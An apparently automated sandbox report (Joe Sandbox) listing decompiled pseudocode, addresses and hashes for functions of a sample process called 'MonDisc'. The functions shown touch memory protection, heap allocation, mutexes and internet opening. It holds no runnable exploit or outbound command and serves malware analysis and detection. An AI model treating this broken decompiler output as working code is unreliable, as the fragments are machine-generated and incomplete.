                              Uniqueness Score: -1.00%

                              Function 00007FF62C984AF0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                              Download Yara Rule
                              C-Code - Quality: 15%
                              			E00007FF67FF62C984AF0(void* __ecx, long long __rbx, signed int __rdx, long long __rdi, long long __r14, long long _a8, long long _a16, long long _a24) {
				signed long long _v24;
				int _t20;
				void* _t28;
				void* _t41;
				void* _t43;
				void* _t51;
				void* _t62;
				signed int* _t64;
				signed long long _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				intOrPtr* _t69;
				signed long long _t73;
				void* _t76;
				intOrPtr _t77;
				void* _t79;
				signed long long* _t84;
				void* _t88;
				signed long long _t92;
				intOrPtr _t94;
				signed long long _t95;
				void* _t96;
				signed long long _t100;
				signed long long _t104;

				_a8 = __rbx;
				_a16 = __rdi;
				_a24 = __r14;
				_t41 = __ecx;
				_t64 = __rdx - 3;
				if (_t64 - 1 <= 0) goto 0x2c984c96;
				_t43 = __ecx - 0x16;
				if (_t43 > 0) goto 0x2c984bdb;
				asm("bt eax, ecx");
				if (_t43 >= 0) goto 0x2c984bdb;
				r15d = 0;
				0x2c9c5b38();
				if (__ecx == 2) goto 0x2c984b48;
				if (__ecx != 0x15) goto 0x2c984b82;
				if ( *0x2ca377e8 != 0) goto 0x2c984b82;
				_t20 = SetConsoleCtrlHandler(??, ??); // executed
				if (_t20 == 0) goto 0x2c984b70;
				 *0x2ca377e8 = 1;
				goto 0x2c984b82;
				0x2c984d64();
				 *_t64 =  *0x2c9ee040();
				E00007FF67FF62C984730(__ecx, _t20);
				if (_t64 == 0) goto 0x2c984bc1;
				_t92 =  *0x2ca361d8; // 0xd614c512c627
				_t104 = _t92 ^  *_t64;
				asm("dec ecx");
				_v24 = _t104;
				if (__rdx == 2) goto 0x2c984bc1;
				asm("dec ecx");
				_t100 = __rdx ^ _t92;
				 *_t64 = _t100;
				E00007FF67FF62C9C5B8C();
				if (1 != 0) goto 0x2c984c96;
				_t65 = _t104;
				goto 0x2c984cb4;
				_t51 = __ecx - 0xb;
				if (_t51 > 0) goto 0x2c984c96;
				asm("bt eax, edi");
				if (_t51 >= 0) goto 0x2c984c96;
				E00007FF67FF62C9C5560(_t65, _t64, __rdx, _t88);
				_t73 = _t65;
				if (_t65 == 0) goto 0x2c984c96;
				_t76 =  *_t65;
				_t66 = _t76;
				if (_t76 != 0x2ca16e00) goto 0x2c984c41;
				_t77 =  *0x2ca16ec8; // 0xc0
				E00007FF67FF62C9C5A90(_t66, _t77);
				 *_t73 = _t66;
				if (_t66 == 0) goto 0x2c984c96;
				E00007FF67FF62C975500();
				_t79 =  *_t73;
				_t67 = _t79;
				_t94 =  *0x2ca16ec0; // 0xc
				_t95 = _t94 + _t94;
				goto 0x2c984c5a;
				if ( *((intOrPtr*)(_t67 + 4)) == _t41) goto 0x2c984c61;
				_t68 = _t67 + 0x10;
				if (_t68 != _t67 + _t95 * 8) goto 0x2c984c51;
				if (_t68 == 0) goto 0x2c984c96;
				_t11 = _t68 + 8; // 0x8
				_t84 = _t11;
				if (_t100 == 2) goto 0x2c984c91;
				_t96 = _t79 + _t95 * 8;
				if (_t68 == _t96) goto 0x2c984c91;
				if ( *((intOrPtr*)(_t84 - 4)) != _t41) goto 0x2c984c91;
				 *_t84 = _t100;
				_t15 =  &(_t84[2]) - 8; // -16
				if (_t15 != _t96) goto 0x2c984c7c;
				_t69 =  *_t84;
				goto 0x2c984cb4;
				_t62 = _t41 - 0x11;
				if (_t62 > 0) goto 0x2c984ca5;
				asm("bt eax, edi");
				if (_t62 < 0) goto 0x2c984cb0;
				_t28 = E00007FF67FF62C984D84(_t69);
				 *_t69 = 0x16;
				return _t28;
			}




























                              0x7ff62c984af0
                              0x7ff62c984af5
                              0x7ff62c984afa
                              0x7ff62c984b08
                              0x7ff62c984b0a
                              0x7ff62c984b12
                              0x7ff62c984b18
                              0x7ff62c984b1b
                              0x7ff62c984b26
                              0x7ff62c984b29
                              0x7ff62c984b31
                              0x7ff62c984b38
                              0x7ff62c984b41
                              0x7ff62c984b46
                              0x7ff62c984b4f
                              0x7ff62c984b5d
                              0x7ff62c984b65
                              0x7ff62c984b67
                              0x7ff62c984b6e
                              0x7ff62c984b70
                              0x7ff62c984b7e
                              0x7ff62c984b84
                              0x7ff62c984b8c
                              0x7ff62c984b8e
                              0x7ff62c984b9e
                              0x7ff62c984ba3
                              0x7ff62c984ba6
                              0x7ff62c984baf
                              0x7ff62c984bb8
                              0x7ff62c984bbb
                              0x7ff62c984bbe
                              0x7ff62c984bc6
                              0x7ff62c984bcd
                              0x7ff62c984bd3
                              0x7ff62c984bd6
                              0x7ff62c984bdb
                              0x7ff62c984bde
                              0x7ff62c984be9
                              0x7ff62c984bec
                              0x7ff62c984bf2
                              0x7ff62c984bf7
                              0x7ff62c984bfd
                              0x7ff62c984c03
                              0x7ff62c984c06
                              0x7ff62c984c13
                              0x7ff62c984c15
                              0x7ff62c984c1c
                              0x7ff62c984c21
                              0x7ff62c984c27
                              0x7ff62c984c36
                              0x7ff62c984c3b
                              0x7ff62c984c3e
                              0x7ff62c984c41
                              0x7ff62c984c48
                              0x7ff62c984c4f
                              0x7ff62c984c54
                              0x7ff62c984c56
                              0x7ff62c984c5d
                              0x7ff62c984c64
                              0x7ff62c984c66
                              0x7ff62c984c66
                              0x7ff62c984c71
                              0x7ff62c984c73
                              0x7ff62c984c7a
                              0x7ff62c984c7f
                              0x7ff62c984c81
                              0x7ff62c984c88
                              0x7ff62c984c8f
                              0x7ff62c984c91
                              0x7ff62c984c94
                              0x7ff62c984c96
                              0x7ff62c984c99
                              0x7ff62c984ca0
                              0x7ff62c984ca3
                              0x7ff62c984ca5
                              0x7ff62c984caa
                              0x7ff62c984cc9

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ConsoleCtrlHandler
                              • String ID:
                              • API String ID: 1513847179-0
                              • Opcode ID: ff3171f18da4137d9c57eb161dbc096080b1290873d4b961447e7f1aa6f8c6c7
                              • Instruction ID: 60c2f081685211e1f1a4783eab2d387979f389ba49f7d24bae0cd4ce4978e3b4
                              • Opcode Fuzzy Hash: ff3171f18da4137d9c57eb161dbc096080b1290873d4b961447e7f1aa6f8c6c7
                              • Instruction Fuzzy Hash: E1419E62F08A4282FF14CB15DC606B92B99AF96BF0F458A36D94DC77D7DE7CE4448202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0000025E7E323DAF Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466285816.0000025E7E2F0000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000025E7E2F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_25e7e2f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction ID: bfe6ef89b3c9b010fb7d1658f2a84f2931fed56f02bf7425acd79c2b715da251
                              • Opcode Fuzzy Hash: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction Fuzzy Hash: BD31C52246CD87BAFE2DB6349C0D379F69CEBAD702F67085484C78F091D1384E49558E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0000025E7E324036 Relevance: 1.6, APIs: 1, Instructions: 92synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466285816.0000025E7E2F0000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000025E7E2F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_25e7e2f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction ID: 9dacdb9c57a419ebab1e79c0a7eb808bd031bb2e2891460614ae1dbe16544151
                              • Opcode Fuzzy Hash: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction Fuzzy Hash: 0D21CD3246DC98A8FE2C72302C4E338EA1CDB5E717F6680E188C74D0C190344FC6568E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0000025E7E323F7F Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466285816.0000025E7E2F0000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000025E7E2F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_25e7e2f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction ID: 4423c47c3ca1e3e367d0d2c18a0d532e7b2b4ccbb53dd1d8f7ae6e344bd16bc2
                              • Opcode Fuzzy Hash: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction Fuzzy Hash: AE11DF2259CD86B9FD2931302C1E3BCE66DDF5AB03FA6149185CA8E0C1D1394F8B559E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B430 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 22%
                              			E00007FF67FF62C93B430(long long __rbx, long long __rcx, void* __rdx, void* _a8, long long _a16) {
				void* _v16;
				long long _v32;
				void* __rdi;
				int _t23;
				long long* _t38;
				long long _t40;
				long long _t49;
				long long _t52;
				signed long long _t57;
				void* _t59;
				long long _t60;
				void* _t61;
				void* _t62;

				_a16 = __rbx;
				_t40 = __rcx;
				_t59 = __rdx;
				if ( *((intOrPtr*)(__rcx + 0xbe8)) == 0) goto 0x2c93b484;
				if ( *((intOrPtr*)(__rcx + 0xbe4)) == 0x20) goto 0x2c93b484;
				r8d = 0x20;
				if (VirtualProtect(??, ??, ??, ??) != 0) goto 0x2c93b47a;
				E00007FF67FF62C93B9D0(__rcx, __rcx, __rdx, _t61);
				asm("int3");
				 *((intOrPtr*)(_t40 + 0xbe4)) = 0x20;
				_t57 =  *(_t40 + 0x698) << 0xa;
				if (__rdx - ( *((intOrPtr*)(_t40 + 0x694)) + 0x00000003 << 0x0000000a & 0xfffff000) <= 0) goto 0x2c93b4b8;
				_t49 = _t40;
				E00007FF67FF62C90FE90(_t40, _t49, _t57, _t61, _t62);
				asm("int3");
				if (_t49 +  *((intOrPtr*)(_t40 + 0xc08)) - _t57 <= 0) goto 0x2c93b4d2;
				E00007FF67FF62C90FE90(_t40, _t40, _t57, _t61, _t62);
				asm("int3"); // executed
				E00007FF67FF62C93B7F0(_t38, _t40, _t40, _t61); // executed
				_t52 = _t40; // executed
				E00007FF67FF62C90FE90(_t40, _t52, _t57, _t61, _t62); // executed
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_v32 = _t40;
				_t60 = _t52;
				if (r8d == 0) goto 0x2c93b57e;
				if ( *((intOrPtr*)(_t52 + 0xbe8)) != _t57) goto 0x2c93b551;
				if ( *((intOrPtr*)(_t60 + 0xbe4)) == 0x20) goto 0x2c93b571;
				r8d = 0x20; // executed
				_t23 = VirtualProtect(_t59, ??, ??); // executed
				if (_t23 == 0) goto 0x2c93b600;
				 *((intOrPtr*)(_t60 + 0xbe4)) = 0x20;
				return 0;
			}
















                              0x7ff62c93b430
                              0x7ff62c93b43a
                              0x7ff62c93b43d
                              0x7ff62c93b44a
                              0x7ff62c93b453
                              0x7ff62c93b461
                              0x7ff62c93b46f
                              0x7ff62c93b474
                              0x7ff62c93b479
                              0x7ff62c93b47a
                              0x7ff62c93b4a1
                              0x7ff62c93b4a8
                              0x7ff62c93b4af
                              0x7ff62c93b4b2
                              0x7ff62c93b4b7
                              0x7ff62c93b4c5
                              0x7ff62c93b4cc
                              0x7ff62c93b4d1
                              0x7ff62c93b4d2
                              0x7ff62c93b4dc
                              0x7ff62c93b4df
                              0x7ff62c93b4e4
                              0x7ff62c93b4e5
                              0x7ff62c93b4e6
                              0x7ff62c93b4e7
                              0x7ff62c93b4e8
                              0x7ff62c93b4e9
                              0x7ff62c93b4ea
                              0x7ff62c93b4eb
                              0x7ff62c93b4ec
                              0x7ff62c93b4ed
                              0x7ff62c93b4ee
                              0x7ff62c93b4ef
                              0x7ff62c93b4f0
                              0x7ff62c93b4fd
                              0x7ff62c93b503
                              0x7ff62c93b50f
                              0x7ff62c93b518
                              0x7ff62c93b526
                              0x7ff62c93b52c
                              0x7ff62c93b534
                              0x7ff62c93b53a
                              0x7ff62c93b550

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 57f19f73c82ce0a22146285461563a87d77a3de998c2158c29345d21f6e43a7f
                              • Instruction ID: 133bed27b4ba3e1fc9accb78638127106acb27e6882c5eb9a2e74b8546a17062
                              • Opcode Fuzzy Hash: 57f19f73c82ce0a22146285461563a87d77a3de998c2158c29345d21f6e43a7f
                              • Instruction Fuzzy Hash: 1C016121F0958686EF58EB21E8583FD2252DF40BA8F184531DA2E87ACBCF7DD5018215
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9C5ECC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E00007FF67FF62C9C5ECC(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x2c9c5eeb;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x2c9c5f2e;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x2c9c5f12;
				if (E00007FF67FF62C9C3C14() == 0) goto 0x2c9c5f2e;
				if (E00007FF67FF62C9E25C0(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x2c9c5f2e;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x2c9c5efd;
				goto 0x2c9c5f3b;
				E00007FF67FF62C984D84(_t22);
				 *_t22 = 0xc;
				return 0;
			}





                              0x7ff62c9c5ecc
                              0x7ff62c9c5edb
                              0x7ff62c9c5edf
                              0x7ff62c9c5edf
                              0x7ff62c9c5ee9
                              0x7ff62c9c5ef7
                              0x7ff62c9c5efb
                              0x7ff62c9c5f04
                              0x7ff62c9c5f10
                              0x7ff62c9c5f21
                              0x7ff62c9c5f2a
                              0x7ff62c9c5f2c
                              0x7ff62c9c5f2e
                              0x7ff62c9c5f33
                              0x7ff62c9c5f40

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 173dd6f5690576ccd6bf84726eae5db3837aa6fa1268327332b4b041854edff0
                              • Instruction ID: 114291eef664bf58182e2d4a33ced919b9a71479c86af2593be20bafe766e1df
                              • Opcode Fuzzy Hash: 173dd6f5690576ccd6bf84726eae5db3837aa6fa1268327332b4b041854edff0
                              • Instruction Fuzzy Hash: 0DF09054F0920341FE695B629D113B552941F5CBB0F5C5431CD0EC67C3ED2CE690E223
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B610 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E00007FF67FF62C93B610(long long __rbx, long long __rcx, long long* __rdx, void* _a8, long long _a16) {
				int _t11;
				long long* _t15;
				long long* _t26;
				void* _t27;

				_a16 = __rbx;
				_t26 = __rdx;
				if ( *((intOrPtr*)(__rcx + 0xbe8)) != 0) goto 0x2c93b636;
				E00007FF67FF62C93B7F0(_t15, __rcx, __rcx, _t27); // executed
				goto 0x2c93b665;
				if ( *((intOrPtr*)(__rcx + 0xbe4)) == 4) goto 0x2c93b665;
				r8d = 4; // executed
				_t11 = VirtualProtect(??, ??, ??, ??); // executed
				if (_t11 == 0) goto 0x2c93b681;
				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
				 *_t26 =  *((intOrPtr*)(__rcx + 0xbf8));
				return _t11;
			}







                              0x7ff62c93b610
                              0x7ff62c93b61d
                              0x7ff62c93b62a
                              0x7ff62c93b62f
                              0x7ff62c93b634
                              0x7ff62c93b63d
                              0x7ff62c93b64b
                              0x7ff62c93b651
                              0x7ff62c93b659
                              0x7ff62c93b65b
                              0x7ff62c93b66c
                              0x7ff62c93b680

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$Protect$AllocFree
                              • String ID:
                              • API String ID: 3729553426-0
                              • Opcode ID: 8f05001ae3a681e52af4ae4ae8ee654af86365180a678d0bc3cfca32081500b6
                              • Instruction ID: 8bd9e3f5ad4bb10ba5b78c4658b83e065430e7855b1ba5beee143c97626bcd66
                              • Opcode Fuzzy Hash: 8f05001ae3a681e52af4ae4ae8ee654af86365180a678d0bc3cfca32081500b6
                              • Instruction Fuzzy Hash: F3F0EC61B0968685EF54AF26E9547F93360EB48FACF081036DF1E8B756CF38D5508711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5074 Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                              Download Yara Rule
                              C-Code - Quality: 51%
                              			E00007FF67FF62C8F5074(void* __eflags, void* __rax, void* __rbx, signed int __rcx) {
				void* _v16;
				void* _t18;
				long long _t25;
				void* _t32;

				if (__eflags < 0) goto 0x2c8f509a;
				_t25 =  *((intOrPtr*)(__rcx + 0x70 + __rcx * 8));
				 *((long long*)(_t32 - __rax + 0x20 + __rcx * 8)) = _t25;
				if (__eflags >= 0) goto 0x2c8f508b;
				if (( *(__rcx + 0xf) & 0x000000ff) == 0) goto 0x2c8f50c2;
				asm("movaps xmm0, [ebx+0x10]");
				asm("movaps xmm1, [ebx+0x20]");
				asm("movaps xmm2, [ebx+0x30]");
				asm("movaps xmm3, [ebx+0x40]"); // executed
				_t18 =  *__rcx(); // executed
				 *((long long*)(__rcx + 0x50)) = _t25;
				asm("movaps [ebx+0x10], xmm0");
				return _t18;
			}







                              0x7ff62c8f5089
                              0x7ff62c8f508b
                              0x7ff62c8f5090
                              0x7ff62c8f5098
                              0x7ff62c8f50b0
                              0x7ff62c8f50b2
                              0x7ff62c8f50b6
                              0x7ff62c8f50ba
                              0x7ff62c8f50be
                              0x7ff62c8f50c2
                              0x7ff62c8f50c4
                              0x7ff62c8f50c8
                              0x7ff62c8f50d1

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                              • Instruction ID: d40060df0a17990a106941c19d1d09c044d5f018af3adc10a767e17fd0b3a797
                              • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                              • Instruction Fuzzy Hash: E3013C26204E8589DB159F3AC8504ACBBF4FB49F9DB088225DF899732CEF35D545C740
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FF9D0 Relevance: 1.4, APIs: 1, Instructions: 114COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00007FF67FF62C8FF9D0() {
				long _t43;
				intOrPtr _t61;
				intOrPtr* _t73;
				long long _t75;
				long long _t76;
				long long _t78;
				signed long long _t80;
				void* _t84;
				long long _t94;
				void* _t96;
				signed long long _t100;
				intOrPtr _t108;
				void* _t112;
				void* _t114;
				void* _t115;
				signed long long _t117;
				signed int _t121;
				long long _t127;

				 *((long long*)(_t114 + 0x18)) = _t75;
				_t115 = _t114 - 0x20;
				_t127 = _t94;
				_t76 = _t78;
				E00007FF67FF62C984D84(_t73);
				_t61 =  *_t73;
				 *((intOrPtr*)(_t115 + 0x60)) = _t61;
				_t43 = GetLastError();
				_t117 =  *((intOrPtr*)(_t76 + 0x20));
				r15d = _t43;
				_t108 =  *((intOrPtr*)(_t76 + 0x10));
				_t80 =  *(_t76 + 0x50) & 0xfffffffc;
				 *(_t115 + 0x68) = _t43;
				r8d =  *(_t80 + 0x20);
				 *((long long*)(_t80 + 0x60)) = _t127;
				_t112 =  *((intOrPtr*)(( *(_t117 - 0x10) & 0xffffffff) + 0x20)) - 0x68;
				r8d = E00007FF67FF62C8FEF60(0xffffffff, _t112, _t127);
				_t121 = _t117 * 8;
				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
				_t84 = _t108 + 0x2d8;
				if ( *((intOrPtr*)(_t84 + 0xec)) == 0) goto 0x2c8ffa78;
				_t96 = _t127 - 4;
				 *((long long*)(_t84 + 0x80)) = _t76;
				E00007FF67FF62C910750(_t84, _t96); // executed
				if (( *(_t108 + 0x91) & 0x00000008) == 0) goto 0x2c8ffab2;
				if ( *((intOrPtr*)(_t108 + 0x148)) != 0) goto 0x2c8ffab2;
				 *((intOrPtr*)(_t108 + 0x148)) =  *((intOrPtr*)(_t108 + 0x14c));
				_t25 = _t96 - 4; // -1
				r8d = _t25;
				E00007FF67FF62C8FEEA0( *((intOrPtr*)(_t108 + 0x14c)), 3, _t76);
				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
				if (( *(_t108 + 0x91) & 0x00000004) == 0) goto 0x2c8ffb23;
				_t100 = _t127 - _t112 - 0x68 >> 2;
				r15d = E00007FF67FF62C917CA0(2, _t112);
				if (_t127 -  *((intOrPtr*)(_t80 + 0x60)) <= 0) goto 0x2c8ffaff;
				if (_t61 - 1 -  *((intOrPtr*)(_t112 + 0xc)) >= 0) goto 0x2c8ffaff;
				if (r15d == E00007FF67FF62C917CA0(_t61 - 1, _t112)) goto 0x2c8ffb1a;
				r8d = r15d;
				E00007FF67FF62C8FEEA0(_t49, 2, _t76);
				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
				r15d =  *(_t115 + 0x68);
				if (( *(_t108 + 0x91) & 0x00000002) == 0) goto 0x2c8ffb4a;
				if (( *(_t127 - 4) & 0x000000ff) - 0x49 - 3 > 0) goto 0x2c8ffb4a;
				_t40 = _t100 - 2; // -1
				r8d = _t40;
				E00007FF67FF62C8FEEA0(( *(_t127 - 4) & 0x000000ff) - 0x49, 1, _t76);
				E00007FF67FF62C984D84(0xffffffff);
				 *0xffffffff =  *((intOrPtr*)(_t115 + 0x60));
				goto ( *0x2c9ee048);
			}





















                              0x7ff62c8ff9d0
                              0x7ff62c8ff9e0
                              0x7ff62c8ff9e4
                              0x7ff62c8ff9e7
                              0x7ff62c8ff9ea
                              0x7ff62c8ff9ef
                              0x7ff62c8ff9f1
                              0x7ff62c8ff9f5
                              0x7ff62c8ff9fb
                              0x7ff62c8ffa06
                              0x7ff62c8ffa09
